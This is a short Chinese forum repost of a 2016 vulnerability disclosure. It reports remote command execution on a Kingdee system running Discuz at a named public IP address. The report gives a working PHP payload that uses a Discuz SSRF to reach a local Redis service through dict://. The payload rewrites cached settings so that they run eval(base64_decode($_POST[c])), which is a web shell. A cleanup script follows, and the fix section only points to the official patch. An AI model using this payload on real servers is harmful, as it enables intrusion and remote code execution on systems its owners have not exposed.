HanDs
NO.2

[7月漏洞公开] 金蝶某系统存在远程命令执行 





学习中请遵循国家相关法律法规,黑客不作恶。没有网络安全就没有国家安全

本站需要登陆后才能查看

金蝶某系统存在远程命令执行

详细说明:

http://118.194.40.105/ 为discuz,且服务器存在redis服务,通过ssrf

WooYun: Discuz!另一处SSRF无须登陆无须条件



可以更改discuz缓存代码,从而实现远程命令执行。



设置

code 区域
<?php
header('Location: dict://127.0.0.1:6379/eval:"local:t=redis.call(\'keys\',\'*_setting\');for:i,v:in:ipairs(t):do:redis.call(\'set\',v,\'a\x3a2\x3a{s\x3a6\x3a\"output\";a\x3a1\x3a{s\x3a4\x3a\"preg\";a\x3a2\x3a{s\x3a6\x3a\"search\";s\x3a5\x3a\"/.*/e\";s\x3a7\x3a\"replace\";s\x3a33\x3a\"eval(base64_decode($_POST[c]));\";}}s\x3a13\x3a\"rewritestatus\";i\x3a1;}\'):end;return:1;":0');
?>





还原

<?php

header('Location: dict://127.0.0.1:6379/eval:"local:t=redis.call(\'keys\',\'*_setting\');for:i,v:in:ipairs(t):do:redis.call(\'del\',v):end;return:1;":0');

?>



漏洞证明:

1.png

修复方案:

请看官方补丁,或者修复discuz 的ssrf


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
金蝶 系统 存在 远程 命令 执行
#1楼
发帖时间:2016-7-15   |   查看数:0   |   回复数:0
游客组